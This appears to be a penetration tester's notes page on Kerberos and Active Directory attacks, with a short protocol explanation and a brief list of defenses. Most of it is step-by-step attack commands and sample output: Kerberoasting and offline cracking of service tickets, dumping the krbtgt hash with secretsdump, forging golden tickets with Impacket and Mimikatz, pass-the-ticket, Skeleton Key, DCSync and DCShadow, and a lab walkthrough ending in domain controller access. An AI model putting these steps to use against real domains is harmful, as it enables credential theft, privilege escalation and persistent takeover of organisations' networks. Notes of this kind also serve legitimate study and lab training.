Kerberos

General

3 Heads of Kerberos:
- Client > TrustedServer/DC > Server

Ticket Flow

Ticket Flow

Example

Request TGT >

Apply for Drivers License >

< TGT + SessionKey

< Granted with Hologram

TGT + Request to TGS >

Request go to to ABC Store >

< ServiceTicket

< Approved w/ ABC Hash/Ticket

Auth to Service w/ServiceTicket >

Going to ABC Store >

3 Long-Term Keys

Client (me)
Target/Service key
KDC (from krbtgt acct)

Group Policy for TGT Encryption

Computer Config > Policy > Windows Settings > Security Settings
> Local Policy > Security Options Network Security: Configure enc types allowed for Kerb

Attack Flow

Find AD Accts with SPN (map between service and svc-acct)
Request RC4 service tickets from DC
Extract Service Tickets to file
Offline Brute Force

Kerberoasting Targets

MSSQL
AGPMServer (for GPO)
FIMService (Forefront Identity)
STS (Security Token Service VMWare)

Defenses:

Disable RC4 with GPO
Use AES instead
Managed Service Accounts (no pw to change)
Protected Users - pw kerberos keys arent in lsass mem
PAC validation
CredentialGuard - hash and kerb/keys cant be stolen
Services like: "sqlsvc" should not be Domain Admin

Kerberoasting

Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPN's
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output
Found 'svcqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: Grabs tickets with Mimikatz and export to a list
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/[email protected] whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!

Other Method:
- Powerview > Invoke-Kerberoast

Golden Ticket

Impacket:
- secretsdump.py
- wmiexec.py
- lookupsid.py
- ticketer.py

Get the nthash

> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash

Get the FQDN

> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom

Get the Domain SID

> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666

Create a golden ticket!

> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Abuse

The golden ticket - DO NOT EXECUTE !!!
After exporting the Administrator.ccache ticket file..
You can use any tool from the impacket suite like wmiexec or psexec with -k -no-pass

> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k --no-pass

Mimikatz

Create a Golden Ticket with Mimikatz

mimikatz > kerberos::golden /krbtgt :e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt)
mimikatz > ptt golden.ticket.bin

Skeleton Key (mimikatz)

Sets up a special key for login as pw: mimikatz
Patches the LSA Process in Memory
Requires Admin rights and Debug Privs
Reboot to 'clear' the setup

mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!

DCSync (mimikatz)

Copies the "ntds.dit"
REF: NTDS

m> lsadump:dcsync /user:administrator

DCShadow

Similar to DCSync
Register myself as a DC
Uses replication, so almost invisible Logging

Mimikatz GT Lab

-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!

PreviousDLL Hijack MSF NextMemory Analysis

Last updated 2 years ago

hashtagGeneral

hashtagTicket Flow

hashtag3 Long-Term Keys

hashtagGroup Policy for TGT Encryption

hashtagAttack Flow

hashtagKerberoasting Targets

hashtagDefenses:

hashtagKerberoasting

hashtagGolden Ticket

hashtagGet the nthash

hashtagGet the FQDN

hashtagGet the Domain SID

hashtagCreate a golden ticket!

hashtagAbuse

hashtagMimikatz

hashtagSkeleton Key (mimikatz)

hashtagDCSync (mimikatz)

hashtagDCShadow

hashtagMimikatz GT Lab